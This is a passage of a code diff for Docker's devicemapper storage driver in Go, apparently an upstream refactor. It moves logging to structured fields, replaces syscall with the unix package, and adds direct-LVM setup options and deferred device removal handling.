@@ -1444,7 +1419,7 @@ func (devices *DeviceSet) processPendingTransaction() error {
 	// If open transaction ID is less than pool transaction ID, something
 	// is wrong. Bail out.
 	if devices.OpenTransactionID < devices.TransactionID {
-		logrus.Errorf("devmapper: Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID)
+		logrus.WithField("storage-driver", "devicemapper").Errorf("Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID)
 		return nil
 	}
 
@@ -1501,19 +1476,16 @@ func (devices *DeviceSet) refreshTransaction(DeviceID int) error {
 
 func (devices *DeviceSet) closeTransaction() error {
 	if err := devices.updatePoolTransactionID(); err != nil {
-		logrus.Debug("devmapper: Failed to close Transaction")
+		logrus.WithField("storage-driver", "devicemapper").Debug("Failed to close Transaction")
 		return err
 	}
 	return nil
 }
 
 func determineDriverCapabilities(version string) error {
-	/*
-	 * Driver version 4.27.0 and greater support deferred activation
-	 * feature.
-	 */
+	// Kernel driver version >= 4.27.0 support deferred removal
 
-	logrus.Debugf("devicemapper: driver version is %s", version)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("kernel dm driver version is %s", version)
 
 	versionSplit := strings.Split(version, ".")
 	major, err := strconv.Atoi(versionSplit[0])
@@ -1549,16 +1521,17 @@ func determineDriverCapabilities(version string) error {
 
 // Determine the major and minor number of loopback device
 func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) {
-	stat, err := file.Stat()
+	var stat unix.Stat_t
+	err := unix.Stat(file.Name(), &stat)
 	if err != nil {
 		return 0, 0, err
 	}
 
-	dev := stat.Sys().(*syscall.Stat_t).Rdev
+	dev := stat.Rdev
 	majorNum := major(dev)
 	minorNum := minor(dev)
 
-	logrus.Debugf("devmapper: Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum)
 	return majorNum, minorNum, nil
 }
 
@@ -1567,7 +1540,7 @@ func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) {
 func getLoopFileDeviceMajMin(filename string) (string, uint64, uint64, error) {
 	file, err := os.Open(filename)
 	if err != nil {
-		logrus.Debugf("devmapper: Failed to open file %s", filename)
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Failed to open file %s", filename)
 		return "", 0, 0, err
 	}
 
@@ -1598,7 +1571,7 @@ func (devices *DeviceSet) getThinPoolDataMetaMajMin() (uint64, uint64, uint64, u
 		return 0, 0, 0, 0, err
 	}
 
-	logrus.Debugf("devmapper: poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin)
 
 	poolDataMajMinorSplit := strings.Split(poolDataMajMin, ":")
 	poolDataMajor, err := strconv.ParseUint(poolDataMajMinorSplit[0], 10, 32)
@@ -1678,7 +1651,7 @@ func (devices *DeviceSet) enableDeferredRemovalDeletion() error {
 		if !devicemapper.LibraryDeferredRemovalSupport {
 			return fmt.Errorf("devmapper: Deferred removal can not be enabled as libdm does not support it")
 		}
-		logrus.Debug("devmapper: Deferred removal support enabled.")
+		logrus.WithField("storage-driver", "devicemapper").Debug("Deferred removal support enabled.")
 		devices.deferredRemove = true
 	}
 
@@ -1686,36 +1659,25 @@ func (devices *DeviceSet) enableDeferredRemovalDeletion() error {
 		if !devices.deferredRemove {
 			return fmt.Errorf("devmapper: Deferred deletion can not be enabled as deferred removal is not enabled. Enable deferred removal using --storage-opt dm.use_deferred_removal=true parameter")
 		}
-		logrus.Debug("devmapper: Deferred deletion support enabled.")
+		logrus.WithField("storage-driver", "devicemapper").Debug("Deferred deletion support enabled.")
 		devices.deferredDelete = true
 	}
 	return nil
 }
 
-func (devices *DeviceSet) initDevmapper(doInit bool) error {
-	// give ourselves to libdm as a log handler
-	devicemapper.LogInit(devices)
-
-	version, err := devicemapper.GetDriverVersion()
-	if err != nil {
-		// Can't even get driver version, assume not supported
-		return graphdriver.ErrNotSupported
-	}
-
-	if err := determineDriverCapabilities(version); err != nil {
-		return graphdriver.ErrNotSupported
-	}
-
+func (devices *DeviceSet) initDevmapper(doInit bool) (retErr error) {
 	if err := devices.enableDeferredRemovalDeletion(); err != nil {
 		return err
 	}
 
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
 	// https://github.com/docker/docker/issues/4036
 	if supported := devicemapper.UdevSetSyncSupport(true); !supported {
 		if dockerversion.IAmStatic == "true" {
-			logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option")
+			logger.Error("Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/dockerd/#storage-driver-options")
 		} else {
-			logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option")
+			logger.Error("Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/dockerd/#storage-driver-options")
 		}
 
 		if !devices.overrideUdevSyncCheck {
@@ -1729,28 +1691,55 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 	if err != nil {
 		return err
 	}
-	if err := idtools.MkdirAs(devices.root, 0700, uid, gid); err != nil && !os.IsExist(err) {
+	if err := idtools.MkdirAndChown(devices.root, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil {
 		return err
 	}
-	if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil && !os.IsExist(err) {
+	if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil {
 		return err
 	}
 
-	// Set the device prefix from the device id and inode of the docker root dir
-
-	st, err := os.Stat(devices.root)
+	prevSetupConfig, err := readLVMConfig(devices.root)
 	if err != nil {
+		return err
+	}
+
+	if !reflect.DeepEqual(devices.lvmSetupConfig, directLVMConfig{}) {
+		if devices.thinPoolDevice != "" {
+			return errors.New("cannot setup direct-lvm when `dm.thinpooldev` is also specified")
+		}
+
+		if !reflect.DeepEqual(prevSetupConfig, devices.lvmSetupConfig) {
+			if !reflect.DeepEqual(prevSetupConfig, directLVMConfig{}) {
+				return errors.New("changing direct-lvm config is not supported")
+			}
+			logger.WithField("direct-lvm-config", devices.lvmSetupConfig).Debugf("Setting up direct lvm mode")
+			if err := verifyBlockDevice(devices.lvmSetupConfig.Device, lvmSetupConfigForce); err != nil {
+				return err
+			}
+			if err := setupDirectLVM(devices.lvmSetupConfig); err != nil {
+				return err
+			}
+			if err := writeLVMConfig(devices.root, devices.lvmSetupConfig); err != nil {
+				return err
+			}
+		}
+		devices.thinPoolDevice = "docker-thinpool"
+		logger.Debugf("Setting dm.thinpooldev to %q", devices.thinPoolDevice)
+	}
+
+	// Set the device prefix from the device id and inode of the docker root dir
+	var st unix.Stat_t
+	if err := unix.Stat(devices.root, &st); err != nil {
 		return fmt.Errorf("devmapper: Error looking up dir %s: %s", devices.root, err)
 	}
-	sysSt := st.Sys().(*syscall.Stat_t)
 	// "reg-" stands for "regular file".
 	// In the future we might use "dev-" for "device file", etc.
 	// docker-maj,min[-inode] stands for:
 	//	- Managed by docker
 	//	- The target of this device is at major <maj> and minor <min>
 	//	- If <inode> is defined, use that file inside the device as a loopback image. Otherwise use the device itself.
-	devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(sysSt.Dev), minor(sysSt.Dev), sysSt.Ino)
-	logrus.Debugf("devmapper: Generated prefix: %s", devices.devicePrefix)
+	devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(st.Dev), minor(st.Dev), st.Ino)
+	logger.Debugf("Generated prefix: %s", devices.devicePrefix)
 
 	// Check for the existence of the thin-pool device
 	poolExists, err := devices.thinPoolExists(devices.getPoolName())
@@ -1770,7 +1759,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 
 	// If the pool doesn't exist, create it
 	if !poolExists && devices.thinPoolDevice == "" {
-		logrus.Debug("devmapper: Pool doesn't exist. Creating it.")
+		logger.Debug("Pool doesn't exist. Creating it.")
 
 		var (
 			dataFile     *os.File
@@ -1792,7 +1781,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 
 			data, err := devices.ensureImage("data", devices.dataLoopbackSize)
 			if err != nil {
-				logrus.Debugf("devmapper: Error device ensureImage (data): %s", err)
+				logger.Debugf("Error device ensureImage (data): %s", err)
 				return err
 			}
 
@@ -1825,7 +1814,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 
 			metadata, err := devices.ensureImage("metadata", devices.metaDataLoopbackSize)
 			if err != nil {
-				logrus.Debugf("devmapper: Error device ensureImage (metadata): %s", err)
+				logger.Debugf("Error device ensureImage (metadata): %s", err)
 				return err
 			}
 
@@ -1846,6 +1835,14 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 		if err := devicemapper.CreatePool(devices.getPoolName(), dataFile, metadataFile, devices.thinpBlockSize); err != nil {
 			return err
 		}
+		defer func() {
+			if retErr != nil {
+				err = devices.deactivatePool()
+				if err != nil {
+					logger.Warnf("Failed to deactivatePool: %v", err)
+				}
+			}
+		}()
 	}
 
 	// Pool already exists and caller did not pass us a pool. That means
@@ -1854,7 +1851,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 	// pool, like is it using loop devices.
 	if poolExists && devices.thinPoolDevice == "" {
 		if err := devices.loadThinPoolLoopBackInfo(); err != nil {
-			logrus.Debugf("devmapper: Failed to load thin pool loopback device information:%v", err)
+			logger.Debugf("Failed to load thin pool loopback device information:%v", err)
 			return err
 		}
 	}
@@ -1869,7 +1866,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 
 	if devices.thinPoolDevice == "" {
 		if devices.metadataLoopFile != "" || devices.dataLoopFile != "" {
-			logrus.Warn("devmapper: Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man docker` to refer to dm.thinpooldev section.")
+			logger.Warn("Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man dockerd` to refer to dm.thinpooldev section.")
 		}
 	}
 
@@ -1882,7 +1879,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 	// Setup the base image
 	if doInit {
 		if err := devices.setupBaseImage(); err != nil {
-			logrus.Debugf("devmapper: Error device setupBaseImage: %s", err)
+			logger.Debugf("Error device setupBaseImage: %s", err)
 			return err
 		}
 	}
@@ -1892,8 +1889,8 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error {
 
 // AddDevice adds a device and registers in the hash.
 func (devices *DeviceSet) AddDevice(hash, baseHash string, storageOpt map[string]string) error {
-	logrus.Debugf("devmapper: AddDevice START(hash=%s basehash=%s)", hash, baseHash)
-	defer logrus.Debugf("devmapper: AddDevice END(hash=%s basehash=%s)", hash, baseHash)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("AddDevice START(hash=%s basehash=%s)", hash, baseHash)
+	defer logrus.WithField("storage-driver", "devicemapper").Debugf("AddDevice END(hash=%s basehash=%s)", hash, baseHash)
 
 	// If a deleted device exists, return error.
 	baseInfo, err := devices.lookupDeviceWithLock(baseHash)
@@ -1975,7 +1972,7 @@ func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error {
 		return nil
 	}
 
-	logrus.Debugf("devmapper: Marking device %s for deferred deletion.", info.Hash)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("Marking device %s for deferred deletion.", info.Hash)
 
 	info.Deleted = true
 
@@ -1992,7 +1989,7 @@ func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error {
 // Should be called with devices.Lock() held.
 func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) error {
 	if err := devices.openTransaction(info.Hash, info.DeviceID); err != nil {
-		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceId = %d", "", info.DeviceID)
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Error opening transaction hash = %s deviceId = %d", "", info.DeviceID)
 		return err
 	}
 
@@ -2004,13 +2001,13 @@ func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) erro
 		// deletion is not enabled, we return an error. If error is
 		// something other then EBUSY, return an error.
 		if syncDelete || !devices.deferredDelete || err != devicemapper.ErrBusy {
-			logrus.Debugf("devmapper: Error deleting device: %s", err)
+			logrus.WithField("storage-driver", "devicemapper").Debugf("Error deleting device: %s", err)
 			return err
 		}
 	}
 
 	if err == nil {
-		if err := devices.unregisterDevice(info.DeviceID, info.Hash); err != nil {
+		if err := devices.unregisterDevice(info.Hash); err != nil {
 			return err
 		}
 		// If device was already in deferred delete state that means
@@ -2031,8 +2028,9 @@ func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) erro
 
 // Issue discard only if device open count is zero.
 func (devices *DeviceSet) issueDiscard(info *devInfo) error {
-	logrus.Debugf("devmapper: issueDiscard START(device: %s).", info.Hash)
-	defer logrus.Debugf("devmapper: issueDiscard END(device: %s).", info.Hash)
+	logger := logrus.WithField("storage-driver", "devicemapper")
+	logger.Debugf("issueDiscard START(device: %s).", info.Hash)
+	defer logger.Debugf("issueDiscard END(device: %s).", info.Hash)
 	// This is a workaround for the kernel not discarding block so
 	// on the thin pool when we remove a thinp device, so we do it
 	// manually.
@@ -2048,12 +2046,12 @@ func (devices *DeviceSet) issueDiscard(info *devInfo) error {
 	}
 
 	if devinfo.OpenCount != 0 {
-		logrus.Debugf("devmapper: Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount)
+		logger.Debugf("Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount)
 		return nil
 	}
 
 	if err := devicemapper.BlockDeviceDiscard(info.DevName()); err != nil {
-		logrus.Debugf("devmapper: Error discarding block on device: %s (ignoring)", err)
+		logger.Debugf("Error discarding block on device: %s (ignoring)", err)
 	}
 	return nil
 }
@@ -2065,24 +2063,29 @@ func (devices *DeviceSet) deleteDevice(info *devInfo, syncDelete bool) error {
 	}
 
 	// Try to deactivate device in case it is active.
-	if err := devices.deactivateDevice(info); err != nil {
-		logrus.Debugf("devmapper: Error deactivating device: %s", err)
-		return err
+	// If deferred removal is enabled and deferred deletion is disabled
+	// then make sure device is removed synchronously. There have been
+	// some cases of device being busy for short duration and we would
+	// rather busy wait for device removal to take care of these cases.
+	deferredRemove := devices.deferredRemove
+	if !devices.deferredDelete {
+		deferredRemove = false
 	}
 
-	if err := devices.deleteTransaction(info, syncDelete); err != nil {
+	if err := devices.deactivateDeviceMode(info, deferredRemove); err != nil {
+		logrus.WithField("storage-driver", "devicemapper").Debugf("Error deactivating device: %s", err)
 		return err
 	}
 
-	return nil
+	return devices.deleteTransaction(info, syncDelete)
 }
 
 // DeleteDevice will return success if device has been marked for deferred
 // removal. If one wants to override that and want DeleteDevice() to fail if
 // device was busy and could not be deleted, set syncDelete=true.
 func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error {
-	logrus.Debugf("devmapper: DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete)
-	defer logrus.Debugf("devmapper: DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete)
+	defer logrus.WithField("storage-driver", "devicemapper").Debugf("DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete)
 	info, err := devices.lookupDeviceWithLock(hash)
 	if err != nil {
 		return err
@@ -2098,8 +2101,8 @@ func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error {
 }
 
 func (devices *DeviceSet) deactivatePool() error {
-	logrus.Debug("devmapper: deactivatePool() START")
-	defer logrus.Debug("devmapper: deactivatePool() END")
+	logrus.WithField("storage-driver", "devicemapper").Debug("deactivatePool() START")
+	defer logrus.WithField("storage-driver", "devicemapper").Debug("deactivatePool() END")
 	devname := devices.getPoolDevName()
 
 	devinfo, err := devicemapper.GetInfo(devname)
@@ -2115,15 +2118,20 @@ func (devices *DeviceSet) deactivatePool() error {
 	}
 
 	if d, err := devicemapper.GetDeps(devname); err == nil {
-		logrus.Warnf("devmapper: device %s still has %d active dependents", devname, d.Count)
+		logrus.WithField("storage-driver", "devicemapper").Warnf("device %s still has %d active dependents", devname, d.Count)
 	}
 
 	return nil
 }
 
 func (devices *DeviceSet) deactivateDevice(info *devInfo) error {
-	logrus.Debugf("devmapper: deactivateDevice START(%s)", info.Hash)
-	defer logrus.Debugf("devmapper: deactivateDevice END(%s)", info.Hash)
+	return devices.deactivateDeviceMode(info, devices.deferredRemove)
+}
+
+func (devices *DeviceSet) deactivateDeviceMode(info *devInfo, deferredRemove bool) error {
+	var err error
+	logrus.WithField("storage-driver", "devicemapper").Debugf("deactivateDevice START(%s)", info.Hash)
+	defer logrus.WithField("storage-driver", "devicemapper").Debugf("deactivateDevice END(%s)", info.Hash)
 
 	devinfo, err := devicemapper.GetInfo(info.Name())
 	if err != nil {
@@ -2134,14 +2142,17 @@ func (devices *DeviceSet) deactivateDevice(info *devInfo) error {
 		return nil
 	}
 
-	if devices.deferredRemove {
-		if err := devicemapper.RemoveDeviceDeferred(info.Name()); err != nil {
-			return err
-		}
+	if deferredRemove {
+		err = devicemapper.RemoveDeviceDeferred(info.Name())
 	} else {
-		if err := devices.removeDevice(info.Name()); err != nil {
-			return err
-		}
+		err = devices.removeDevice(info.Name())
+	}
+
+	// This function's semantics is such that it does not return an
+	// error if device does not exist. So if device went away by
+	// the time we actually tried to remove it, do not return error.
+	if err != devicemapper.ErrEnxio {
+		return err
 	}
 	return nil
 }
@@ -2150,8 +2161,8 @@ func (devices *DeviceSet) deactivateDevice(info *devInfo) error {
 func (devices *DeviceSet) removeDevice(devname string) error {
 	var err error
 
-	logrus.Debugf("devmapper: removeDevice START(%s)", devname)
-	defer logrus.Debugf("devmapper: removeDevice END(%s)", devname)
+	logrus.WithField("storage-driver", "devicemapper").Debugf("removeDevice START(%s)", devname)
+	defer logrus.WithField("storage-driver", "devicemapper").Debugf("removeDevice END(%s)", devname)
 
 	for i := 0; i < 200; i++ {
 		err = devicemapper.RemoveDevice(devname)
@@ -2177,8 +2188,8 @@ func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error {
 		return nil
 	}
 
-	logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded START(%s)", info.Name())
-	defer logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded END(%s)", info.Name())
+	logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemovalIfNeeded START(%s)", info.Name())
+	defer logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemovalIfNeeded END(%s)", info.Name())
 
 	devinfo, err := devicemapper.GetInfoWithDeferred(info.Name())
 	if err != nil {
@@ -2200,8 +2211,8 @@ func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error {
 }
 
 func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error {
-	logrus.Debugf("devmapper: cancelDeferredRemoval START(%s)", info.Name())
-	defer logrus.Debugf("devmapper: cancelDeferredRemoval END(%s)", info.Name())
+	logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemoval START(%s)", info.Name())
+	defer logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemoval END(%s)", info.Name())
 
 	var err error
 
@@ -2223,11 +2234,47 @@ func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error {
 	return err
 }
 
+func (devices *DeviceSet) unmountAndDeactivateAll(dir string) {
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
+	files, err := ioutil.ReadDir(dir)
+	if err != nil {
+		logger.Warnf("unmountAndDeactivate: %s", err)
+		return
+	}
+
+	for _, d := range files {
+		if !d.IsDir() {
+			continue
+		}
+
+		name := d.Name()
+		fullname := path.Join(dir, name)
+
+		// We use MNT_DETACH here in case it is still busy in some running
+		// container. This means it'll go away from the global scope directly,
+		// and the device will be released when that container dies.
+		if err := unix.Unmount(fullname, unix.MNT_DETACH); err != nil && err != unix.EINVAL {
+			logger.Warnf("Shutdown unmounting %s, error: %s", fullname, err)
+		}
+
+		if devInfo, err := devices.lookupDevice(name); err != nil {
+			logger.Debugf("Shutdown lookup device %s, error: %s", name, err)
+		} else {
+			if err := devices.deactivateDevice(devInfo); err != nil {
+				logger.Debugf("Shutdown deactivate %s, error: %s", devInfo.Hash, err)
+			}
+		}
+	}
+}
+
 // Shutdown shuts down the device by unmounting the root.
 func (devices *DeviceSet) Shutdown(home string) error {
-	logrus.Debugf("devmapper: [deviceset %s] Shutdown()", devices.devicePrefix)
-	logrus.Debugf("devmapper: Shutting down DeviceSet: %s", devices.root)
-	defer logrus.Debugf("devmapper: [deviceset %s] Shutdown() END", devices.devicePrefix)
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
+	logger.Debugf("[deviceset %s] Shutdown()", devices.devicePrefix)
+	logger.Debugf("Shutting down DeviceSet: %s", devices.root)
+	defer logger.Debugf("[deviceset %s] Shutdown() END", devices.devicePrefix)
 
 	// Stop deletion worker. This should start delivering new events to
 	// ticker channel. That means no new instance of cleanupDeletedDevice()
@@ -2244,45 +2291,7 @@ func (devices *DeviceSet) Shutdown(home string) error {
 	// will be killed and we will not get a chance to save deviceset
 	// metadata. Hence save this early before trying to deactivate devices.
 	devices.saveDeviceSetMetaData()
-
-	// ignore the error since it's just a best effort to not try to unmount something that's mounted
-	mounts, _ := mount.GetMounts()
-	mounted := make(map[string]bool, len(mounts))
-	for _, mnt := range mounts {
-		mounted[mnt.Mountpoint] = true
-	}
-
-	if err := filepath.Walk(path.Join(home, "mnt"), func(p string, info os.FileInfo, err error) error {
-		if err != nil {
-			return err
-		}
-		if !info.IsDir() {
-			return nil
-		}
-
-		if mounted[p] {
-			// We use MNT_DETACH here in case it is still busy in some running
-			// container. This means it'll go away from the global scope directly,
-			// and the device will be released when that container dies.
-			if err := syscall.Unmount(p, syscall.MNT_DETACH); err != nil {
-				logrus.Debugf("devmapper: Shutdown unmounting %s, error: %s", p, err)
-			}
-		}
-
-		if devInfo, err := devices.lookupDevice(path.Base(p)); err != nil {
-			logrus.Debugf("devmapper: Shutdown lookup device %s, error: %s", path.Base(p), err)
-		} else {
-			if err := devices.deactivateDevice(devInfo); err != nil {
-				logrus.Debugf("devmapper: Shutdown deactivate %s , error: %s", devInfo.Hash, err)
-			}
-		}
-
-		return nil
-	}); err != nil && !os.IsNotExist(err) {
-		devices.Unlock()
-		return err
-	}
-
+	devices.unmountAndDeactivateAll(path.Join(home, "mnt"))
 	devices.Unlock()
 
 	info, _ := devices.lookupDeviceWithLock("")
@@ -2290,7 +2299,7 @@ func (devices *DeviceSet) Shutdown(home string) error {
 		info.lock.Lock()
 		devices.Lock()
 		if err := devices.deactivateDevice(info); err != nil {
-			logrus.Debugf("devmapper: Shutdown deactivate base , error: %s", err)
+			logger.Debugf("Shutdown deactivate base , error: %s", err)
 		}
 		devices.Unlock()
 		info.lock.Unlock()
@@ -2299,7 +2308,7 @@ func (devices *DeviceSet) Shutdown(home string) error {
 	devices.Lock()
 	if devices.thinPoolDevice == "" {
 		if err := devices.deactivatePool(); err != nil {
-			logrus.Debugf("devmapper: Shutdown deactivate pool , error: %s", err)
+			logger.Debugf("Shutdown deactivate pool , error: %s", err)
 		}
 	}
 	devices.Unlock()
@@ -2372,12 +2381,12 @@ func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error {
 	options = joinMountOptions(options, label.FormatMountLabel("", mountLabel))
 
 	if err := mount.Mount(info.DevName(), path, fstype, options); err != nil {
-		return fmt.Errorf("devmapper: Error mounting '%s' on '%s': %s", info.DevName(), path, err)
+		return fmt.Errorf("devmapper: Error mounting '%s' on '%s' (fstype='%s' options='%s'): %s\n%v", info.DevName(), path, fstype, options, err, string(dmesg.Dmesg(256)))
 	}
 
 	if fstype == "xfs" && devices.xfsNospaceRetries != "" {
 		if err := devices.xfsSetNospaceRetries(info); err != nil {
-			syscall.Unmount(path, syscall.MNT_DETACH)
+			unix.Unmount(path, unix.MNT_DETACH)
 			devices.deactivateDevice(info)
 			return err
 		}
@@ -2388,8 +2397,10 @@ func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error {
 
 // UnmountDevice unmounts the device and removes it from hash.
 func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error {
-	logrus.Debugf("devmapper: UnmountDevice START(hash=%s)", hash)
-	defer logrus.Debugf("devmapper: UnmountDevice END(hash=%s)", hash)
+	logger := logrus.WithField("storage-driver", "devicemapper")
+
+	logger.Debugf("UnmountDevice START(hash=%s)", hash)
+	defer logger.Debugf("UnmountDevice END(hash=%s)", hash)
 
 	info, err := devices.lookupDeviceWithLock(hash)
 	if err != nil {
@@ -2402,17 +2413,25 @@ func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error {
 	devices.Lock()
 	defer devices.Unlock()
 
-	logrus.Debugf("devmapper: Unmount(%s)", mountPath)
-	if err := syscall.Unmount(mountPath, syscall.MNT_DETACH); err != nil {
+	logger.Debugf("Unmount(%s)", mountPath)
+	if err := unix.Unmount(mountPath, unix.MNT_DETACH); err != nil {
 		return err
 	}
-	logrus.Debug("devmapper: Unmount done")
+	logger.Debug("Unmount done")
 
-	if err := devices.deactivateDevice(info); err != nil {
-		return err
+	// Remove the mountpoint here. Removing the mountpoint (in newer kernels)
+	// will cause all other instances of this mount in other mount namespaces
+	// to be killed (this is an anti-DoS measure that is necessary for things
+	// like devicemapper). This is necessary to avoid cases where a libdm mount
+	// that is present in another namespace will cause subsequent RemoveDevice
+	// operations to fail. We ignore any errors here because this may fail on
+	// older kernels which don't have
+	// torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied.
+	if err := os.Remove(mountPath); err != nil {
+		logger.Debugf("error doing a remove on unmounted device %s: %v", mountPath, err)
 	}
 
-	return nil
+	return devices.deactivateDevice(info)
 }
 
 // HasDevice returns true if the device metadata exists.
@@ -2504,9 +2523,9 @@ func (devices *DeviceSet) MetadataDevicePath() string {
 }
 
 func (devices *DeviceSet) getUnderlyingAvailableSpace(loopFile string) (uint64, error) {
-	buf := new(syscall.Statfs_t)
-	if err := syscall.Statfs(loopFile, buf); err != nil {
-		logrus.Warnf("devmapper: Couldn't stat loopfile filesystem %v: %v", loopFile, err)
+	buf := new(unix.Statfs_t)
+	if err := unix.Statfs(loopFile, buf); err != nil {
+		logrus.WithField("storage-driver", "devicemapper").Warnf("Couldn't stat loopfile filesystem %v: %v", loopFile, err)
 		return 0, err
 	}
 	return buf.Bfree * uint64(buf.Bsize), nil
@@ -2516,7 +2535,7 @@ func (devices *DeviceSet) isRealFile(loopFile string) (bool, error) {
 	if loopFile != "" {
 		fi, err := os.Stat(loopFile)
 		if err != nil {
-			logrus.Warnf("devmapper: Couldn't stat loopfile %v: %v", loopFile, err)
+			logrus.WithField("storage-driver", "devicemapper").Warnf("Couldn't stat loopfile %v: %v", loopFile, err)
 			return false, err
 		}
 		return fi.Mode().IsRegular(), nil
@@ -2614,7 +2633,24 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [
 		minFreeSpacePercent:   defaultMinFreeSpacePercent,
 	}
 
+	version, err := devicemapper.GetDriverVersion()
+	if err != nil {
+		// Can't even get driver version, assume not supported
+		return nil, graphdriver.ErrNotSupported
+	}
+
+	if err := determineDriverCapabilities(version); err != nil {
+		return nil, graphdriver.ErrNotSupported
+	}
+
+	if driverDeferredRemovalSupport && devicemapper.LibraryDeferredRemovalSupport {
+		// enable deferred stuff by default
+		enableDeferredDeletion = true
+		enableDeferredRemoval = true
+	}
+
 	foundBlkDiscard := false
+	var lvmSetupConfig directLVMConfig
 	for _, option := range options {
 		key, val, err := parsers.ParseKeyValueOpt(option)
 		if err != nil {
@@ -2643,7 +2679,7 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [
 			devices.metaDataLoopbackSize = size
 		case "dm.fs":
 			if val != "ext4" && val != "xfs" {
-				return nil, fmt.Errorf("devmapper: Unsupported filesystem %s\n", val)
+				return nil, fmt.Errorf("devmapper: Unsupported filesystem %s", val)
 			}
 			devices.filesystem = val
 		case "dm.mkfsarg":
@@ -2709,11 +2745,72 @@ func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps [
 				return nil, err
 			}
 			devices.xfsNospaceRetries = val
+		case "dm.directlvm_device":
+			lvmSetupConfig.Device = val
+		case "dm.directlvm_device_force":
+			lvmSetupConfigForce, err = strconv.ParseBool(val)
+			if err != nil {
+				return nil, err
+			}
+		case "dm.thinp_percent":
+			per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32)
+			if err != nil {
+				return nil, errors.Wrapf(err, "could not parse `dm.thinp_percent=%s`", val)
+			}
+			if per >= 100 {
+				return nil, errors.New("dm.thinp_percent must be greater than 0 and less than 100")
+			}
+			lvmSetupConfig.ThinpPercent = per
+		case "dm.thinp_metapercent":
+			per, err := strconv.ParseUint(strings.TrimSuffix(val, "%"), 10, 32)
+			if err != nil {
+				return nil, errors.Wrapf(err, "could not parse `dm.thinp_metapercent=%s`", val)
+			}
+			if per >= 100 {
+				return nil, errors.New("dm.thinp_metapercent must be greater than 0 and less than 100")
+			}
+			lvmSetupConfig.ThinpMetaPercent = per
